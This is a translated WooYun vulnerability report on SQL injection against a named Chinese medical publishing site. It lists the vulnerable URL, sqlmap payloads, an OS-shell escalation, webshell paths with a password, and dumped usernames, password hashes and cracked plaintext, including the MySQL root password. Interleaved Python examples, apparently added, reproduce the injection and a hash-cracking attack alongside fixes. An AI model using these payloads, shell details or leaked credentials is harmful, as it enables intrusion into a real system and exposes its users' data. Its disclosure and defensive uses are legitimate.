
Vulnerability summary (24 followers)

Defect ID: wooyun-2016-0183372

Title: 索医网 vulnerability (root privileges / Getshell / server privilege escalation) exposing over a million sensitive records (including résumés, hospital reports, etc.)

Vendor: 索医网

Author: 路人甲

Submitted: 2016-03-11 17:13

Fix time: 2016-04-25 17:13

Published: 2016-04-25 17:13

Type: SQL injection

Severity: High

Self-assessed Rank: 16

Status: vendor could not be contacted, or the vendor actively ignored the report

Source: http://www.wooyun.org; for questions or help contact [email protected]



Vulnerability details

Disclosure status:

2016-03-11: actively contacting the vendor and waiting for it to claim the report; details not disclosed publicly
2016-04-25: the vendor has actively ignored the report; details disclosed to the public

Brief description:

Hoping this makes the front page...

Detailed description:

There is an injection point on 索医网 that runs with root privileges. sqlmap --os-shell took a shell straight away and I wrote a one-line webshell; the process turned out to be running with super administrator privileges, so accounts can be added directly, and 3389 (RDP) can be connected to directly as well. It exposes 10 medical/pharmaceutical websites holding a large amount of site data, well over a million sensitive records... far too much data to go through. I logged on to the server and stopped there.

Injection point: http://www.suo1.cn/site/list.php?id=41 (root privileges, --os-shell straight away)
Shell path: http://www.suo1.cn/inc/tmpukzmf.php
One-line webshell: http://www.suo1.cn/inc/1.php password: w
D:\webphp\gl.suo1.cn\inc\> whoami
windows-vdiq430\administrator

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=41) AND 5905=5905 AND (4726=4726
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=41) AND (SELECT 6578 FROM(SELECT COUNT(*),CONCAT(0x7162786a71,(SELECT (ELT(6578=6578,1))),0x7176627871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (1492=1492
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: id=41) AND (SELECT * FROM (SELECT(SLEEP(5)))volC) AND (3818=3818
Type: UNION query
Title: MySQL UNION query (NULL) - 30 columns
Payload: id=41) UNION ALL SELECT CONCAT(0x7162786a71,0x475a426a424e59626656,0x7176627871),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#
---
[15:32:54] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.4.10, PHP 5.4.33
back-end DBMS: MySQL 5.0
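The injection-point summary above shows why every sqlmap payload opens with `41)` and ends with an unbalanced `AND (…`: the application's own query closes the parenthesis. The Python below is an added example, not code from the report or from the site. It rebuilds that query shape over an in-memory SQLite database (a stand-in for the MySQL backend), runs the boolean-based blind and UNION techniques shown in the sqlmap output against it, and shows the same inputs doing nothing against the parameterized version. The `site_list` table, its columns and rows are constructed for the example; `s_user`, `s_username`, `s_password` and the admin hash come from the dump.

```python
import sqlite3

# Constructed stand-in for the site's database. The table behind list.php is
# not named on the page, so `site_list` is hypothetical; `s_user` with
# `s_username`/`s_password` and the admin hash are taken from the sqlmap dump.
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE site_list (id INTEGER, title TEXT, visible INTEGER)")
    con.executemany("INSERT INTO site_list VALUES (?, ?, ?)",
                    [(41, "article 41", 1), (42, "article 42", 1)])
    con.execute("CREATE TABLE s_user (s_username TEXT, s_password TEXT)")
    con.execute("INSERT INTO s_user VALUES ('admin', '0cc175b9c0f1b6a831c399e269772661')")
    return con


def list_vulnerable(con, raw_id):
    """Hypothetical list.php logic. The id lands inside parentheses, which is
    why every sqlmap payload on the page opens with `41)` and closes with an
    unbalanced `AND (…`: the application's own `)` completes it."""
    sql = "SELECT id, title FROM site_list WHERE (id=%s) AND (visible=1)" % raw_id
    return con.execute(sql).fetchall()


def list_parameterized(con, raw_id):
    """The fix: the same query with a bound parameter. The driver sends the
    input as a value, so `41) AND …` is compared against id as a string and
    matches nothing."""
    sql = "SELECT id, title FROM site_list WHERE (id=?) AND (visible=1)"
    return con.execute(sql, (raw_id,)).fetchall()


def boolean_oracle(handler, con, condition):
    """One blind probe: does the page still return a row when `condition` is
    ANDed into the WHERE clause? (sqlmap: `41) AND 5905=5905 AND (4726=4726`)"""
    return len(handler(con, "41) AND (%s) AND (1=1" % condition)) > 0


def blind_extract(handler, con, subquery, max_len=32):
    """Boolean-based blind extraction: recover the result of `subquery` one
    character at a time by asking a yes/no question per candidate character.
    SQLite spells it substr(); MySQL accepts SUBSTRING() as well."""
    alphabet = "0123456789abcdef"   # enough for a hex digest
    out = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            cond = "substr((%s),%d,1)='%s'" % (subquery, pos, ch)
            if boolean_oracle(handler, con, cond):
                out += ch
                break
        else:
            break                   # no candidate matched: end of string
    return out


def union_dump(handler, con):
    """UNION-based read of s_user. The page's query had 30 columns; this
    constructed one has two. SQLite comments with `--`, MySQL with `#`."""
    return handler(con, "41) UNION ALL SELECT s_username, s_password FROM s_user--")


if __name__ == "__main__":
    db = make_db()
    target = "SELECT s_password FROM s_user WHERE s_username='admin'"
    print("blind, vulnerable:    ", blind_extract(list_vulnerable, db, target))
    print("blind, parameterized: ", repr(blind_extract(list_parameterized, db, target)))
    print("union, vulnerable:    ", union_dump(list_vulnerable, db))
    print("union, parameterized: ", union_dump(list_parameterized, db))
```

The parameterized handler is the fix for the injection itself. The escalation the report describes has a separate cause: sqlmap's --os-shell against MySQL stages its helper files through INTO OUTFILE, which needs the FILE privilege and an unset or permissive secure_file_priv. A web application connecting as MySQL root hands both over, so a least-privilege database account and a restrictive secure_file_priv would have stopped the injection from becoming a shell even before the query was fixed.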
available databases [15]:
[*] cs_suo1_cn
[*] hlyj_suo1_cn
[*] hlyje_suo1_cn
[*] information_schema
[*] mysql
[*] performance_schema
[*] qkhl1_suo1_cn
[*] suo1_site
[*] sxhl_org
[*] test
[*] w_site
[*] wanfang
[*] xzhl_suo1_cn
[*] zhuren
[*] zxy_suo1_cn
Database: suo1_site
[17 tables]
+--------------+
| ad_list |
| hlyje_bw |
| maga_columns |
| maga_lm |
| maga_nr |
| maga_series |
| s_user |
| s_wsite |
| wsite_about |
| wsite_menu |
| wsite_mx |
| wsite_mx_kz |
| wsite_news |
| wsite_qk |
| wsite_qknr |
| wsite_temp |
| wx_hongbao |
+--------------+
Database: suo1_site
+--------------+---------+
| Table | Entries |
+--------------+---------+
| wsite_qknr | 230824 |
| maga_nr | 46233 |
| maga_columns | 6376 |
| wsite_news | 1912 |
| maga_series | 713 |
| maga_lm | 176 |
| wx_hongbao | 117 |
| wsite_menu | 71 |
| wsite_about | 30 |
| wsite_qk | 30 |
| s_user | 15 |
| hlyje_bw | 13 |
| wsite_temp | 12 |
| wsite_mx_kz | 10 |
| s_wsite | 7 |
| wsite_mx | 2 |
| ad_list | 1 |
+--------------+---------+
Database: suo1_site
Table: s_user
[7 columns]
+------------+--------------+
| Column | Type |
+------------+--------------+
| Id | int(11) |
| jx_qx | varchar(255) |
| qx | varchar(255) |
| s_email | varchar(255) |
| s_password | varchar(255) |
| s_username | varchar(255) |
| site_id | int(11) |
+------------+--------------+
Database: suo1_site
Table: s_user
[15 entries]
+------------+-------------------------------------------+
| s_username | s_password |
+------------+-------------------------------------------+
| admin | 0cc175b9c0f1b6a831c399e269772661 (a) |
| wyh | 0cc175b9c0f1b6a831c399e269772661 (a) |
| hlyj | 0cc175b9c0f1b6a831c399e269772661 (a) |
| zxy | 0cc175b9c0f1b6a831c399e269772661 (a) |
| qkhl | 0cc175b9c0f1b6a831c399e269772661 (a) |
| hlyje | 0cc175b9c0f1b6a831c399e269772661 (a) |
| xzhl | 0cc175b9c0f1b6a831c399e269772661 (a) |
| hlyjee | 0cc175b9c0f1b6a831c399e269772661 (a) |
| admin1 | 0cc175b9c0f1b6a831c399e269772661 (a) |
| admin2 | 0cc175b9c0f1b6a831c399e269772661 (a) |
| admin3 | 0cc175b9c0f1b6a831c399e269772661 (a) |
| changdayu | e10adc3949ba59abbe56e057f20f883e (123456) |
| peifang | e10adc3949ba59abbe56e057f20f883e (123456) |
| lixiaoyan | e10adc3949ba59abbe56e057f20f883e (123456) |
| yujiayu | e10adc3949ba59abbe56e057f20f883e (123456) |
+------------+-------------------------------------------+
database management system users password hashes:
[*] root [2]:
password hash: *81F5E21E35407D884A6CD4A731AEBFB6AF209E1B root
clear-text password: root
password hash: *AECE71641589CFE947A37D283624CEF55A02C3FE
[*] test [1]:
password hash: *A3629E3861C4C6F5C852E0FB3DA01524963E218E
[*] wf [1]:
password hash: *6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9
clear-text password: 123456
[*] zhuren [1]:
password hash: *FBD85F710780DBDB507D7EC4F64F9E6E58AB00FE
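The hash lists above fall to a dictionary attack because neither storage format is salted: s_password is plain MD5, and the MySQL accounts use mysql_native_password (SHA1 of SHA1). The eleven s_user rows sharing one MD5 value also reveal, before any cracking, that eleven accounts share one password. The Python below is an added example, not from the report: it reimplements both hash formats, runs a constructed five-word list against hashes copied from the dump (reproducing the cracked values the report shows), and contrasts this with salted, iterated PBKDF2 storage. The wordlist and the PBKDF2 parameters are choices made for the example.

```python
import hashlib
import hmac
import os

# Hashes copied from the report's sqlmap output (a subset of each list).
APP_HASHES = {          # suo1_site.s_user.s_password: unsalted MD5
    "admin": "0cc175b9c0f1b6a831c399e269772661",
    "changdayu": "e10adc3949ba59abbe56e057f20f883e",
}
MYSQL_HASHES = {        # mysql.user, mysql_native_password format
    "root": "*81F5E21E35407D884A6CD4A731AEBFB6AF209E1B",
    "wf": "*6BB4837EB74329105EE4568DDA7DC67ED2CA2AD9",
    "test": "*A3629E3861C4C6F5C852E0FB3DA01524963E218E",
}
# Constructed wordlist for the example; a real attack would use a large list.
WORDLIST = ["password", "admin", "a", "123456", "root"]


def md5_hex(password):
    """The application's scheme: unsalted MD5, as the s_password column shows."""
    return hashlib.md5(password.encode()).hexdigest()


def mysql_native_password(password):
    """mysql_native_password: '*' + uppercase hex of SHA1(SHA1(password)).
    No salt, so identical passwords give identical hashes across servers."""
    inner = hashlib.sha1(password.encode()).digest()
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def dictionary_attack(hashes, hash_fn, wordlist):
    """Because neither scheme is salted, each candidate is hashed once and the
    result is looked up against every account. Returns {user: password or None}."""
    table = {hash_fn(word).upper(): word for word in wordlist}
    return {user: table.get(h.upper()) for user, h in hashes.items()}


def hash_password(password, salt=None, iterations=600_000):
    """What the application should store instead: a random per-user salt and
    an iterated KDF (PBKDF2-HMAC-SHA256 here; bcrypt/argon2 are also fine)."""
    salt = os.urandom(16) if salt is None else salt
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (iterations, salt.hex(), dk.hex())


def verify_password(password, stored):
    """Recompute with the stored salt and iteration count; constant-time compare."""
    algo, iterations, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unsupported hash format")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), int(iterations))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    print(dictionary_attack(APP_HASHES, md5_hex, WORDLIST))
    print(dictionary_attack(MYSQL_HASHES, mysql_native_password, WORDLIST))
    stored = hash_password("123456")
    print(stored)
    print(verify_password("123456", stored), verify_password("a", stored))
```

With the salted scheme, two users who both choose "123456" get different stored values, so a leaked table no longer exposes shared passwords, and the iteration count turns the one-hash-per-candidate lookup above into a per-account cost.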


[Screenshots attached to the original report, not reproduced here: 1.jpg, 2.png, 3.png, 4.png, 8.png]


Proof of vulnerability:

All kinds of data can be dumped directly. There are 10 medical/pharmaceutical websites on this server in total, and the volume of data is huge... I will not pull them all out one by one.

Database: cs_suo1_cn
+-----------------+---------+
| Table | Entries |
+-----------------+---------+
| g_log | 303067 |
| g_sh | 155230 |
| g_manuscript | 151804 |
| g_file | 120787 |
| s_user_authors | 109181 |
| login_log | 82075 |
| c_email_log | 57823 |
| c_sms_log | 11079 |
| g_bb_w_fb | 7882 |
| g_jl | 5507 |
| g_cw | 3722 |
| s_getbook_xq | 3013 |
| s_getbook | 2744 |
| g_bb_d_user | 383 |
| g_manuscript_cg | 303 |
| g_bb_m_user | 252 |
| g_bb_w | 151 |
| s_zz_qj | 124 |
| s_permission | 55 |
| s_user | 55 |
| s_zz_yjfx | 35 |
| u_role_qh | 30 |
| s_flow | 28 |
| s_user_quickhf | 28 |
| s_zz_lm | 20 |
| s_zc | 17 |
| s_role | 15 |
| s_gjzt | 11 |
| s_xl | 11 |
| s_zz | 11 |
| c_email | 10 |
| c_sms | 9 |
| g_jdlx | 6 |
| s_yjfx | 6 |
| s_zz_tgyj | 3 |
| g_pdfjyg | 2 |
| g_pdfjyg_cg | 2 |
| g_bb_m | 1 |
| g_magazine | 1 |
| s_jjr | 1 |
+-----------------+---------+
Database: hlyj_suo1_cn
+-----------------+---------+
| Table | Entries |
+-----------------+---------+
| g_log | 341829 |
| g_sh | 163262 |
| g_manuscript | 157563 |
| login_log | 127961 |
| g_file | 127167 |
| s_user_authors | 112475 |
| c_email_log | 70165 |
| c_sms_log | 23955 |
| g_bb_w_fb | 7882 |
| g_jl | 6466 |
| g_cw | 4311 |
| s_getbook_xq | 3484 |
| s_getbook | 3172 |
| pay_zf_log | 1371 |
| g_manuscript_cg | 404 |
| g_bb_d_user | 383 |
| g_bb_m_user | 252 |
| g_bb_w | 151 |
| s_zz_qj | 139 |
| s_user | 98 |
| s_permission | 58 |
| s_zz_yjfx | 35 |
| u_role_qh | 30 |
| s_flow | 28 |
| s_user_quickhf | 28 |
| s_zz_lm | 20 |
| s_zc | 17 |
| s_role | 15 |
| c_sms | 12 |
| s_gjzt | 11 |
| s_xl | 11 |
| s_zz | 11 |
| c_email | 10 |
| pay_zf | 9 |
| g_jdlx | 6 |
| s_yjfx | 6 |
| s_zz_tgyj | 3 |
| g_pdfjyg | 2 |
| g_pdfjyg_cg | 2 |
| g_bb_m | 1 |
| g_magazine | 1 |
| s_jjr | 1 |
+-----------------+---------+
Database: xzhl_suo1_cn
+-------------------+---------+
| Table | Entries |
+-------------------+---------+
| g_log | 4611 |
| login_log | 3119 |
| c_email_log | 1864 |
| g_file | 827 |
| g_manuscript | 805 |
| s_user_authors | 788 |
| g_sh | 783 |
| c_sms_log | 466 |
| s_user | 67 |
| s_permission | 52 |
| g_cw | 51 |
| s_permission_bak1 | 48 |
| s_getbook_xq | 44 |
| s_getbook | 43 |
| g_jl | 42 |
| u_role_qh | 42 |
| site_news_class | 33 |
| s_flow | 31 |
| s_flow_bak1 | 27 |
| s_zz_lm | 23 |
| s_zc | 17 |
| s_role | 16 |
| c_sms | 12 |
| site_info | 12 |
| s_gjzt | 11 |
| s_xl | 11 |
| s_zz | 11 |
| c_email | 10 |
| s_zz_yjfx | 10 |
| s_zz_qj | 8 |
| g_jdlx | 6 |
| g_manuscript_cg | 6 |
| s_yjfx | 6 |
| s_user_quickhf | 3 |
| s_zz_tgyj | 3 |
| g_magazine | 1 |
| site_user | 1 |
+-------------------+---------+


[Screenshots attached to the original report, not reproduced here: 6.png, 7.png, 9.png, 12.jpg]


Fix recommendation:

Fix it...

Copyright notice: please credit the source, 路人甲@乌云, when reposting.


Vulnerability response

Vendor response:

Vendor could not be contacted, or the vendor actively refused

Vulnerability Rank: 15 (WooYun rating)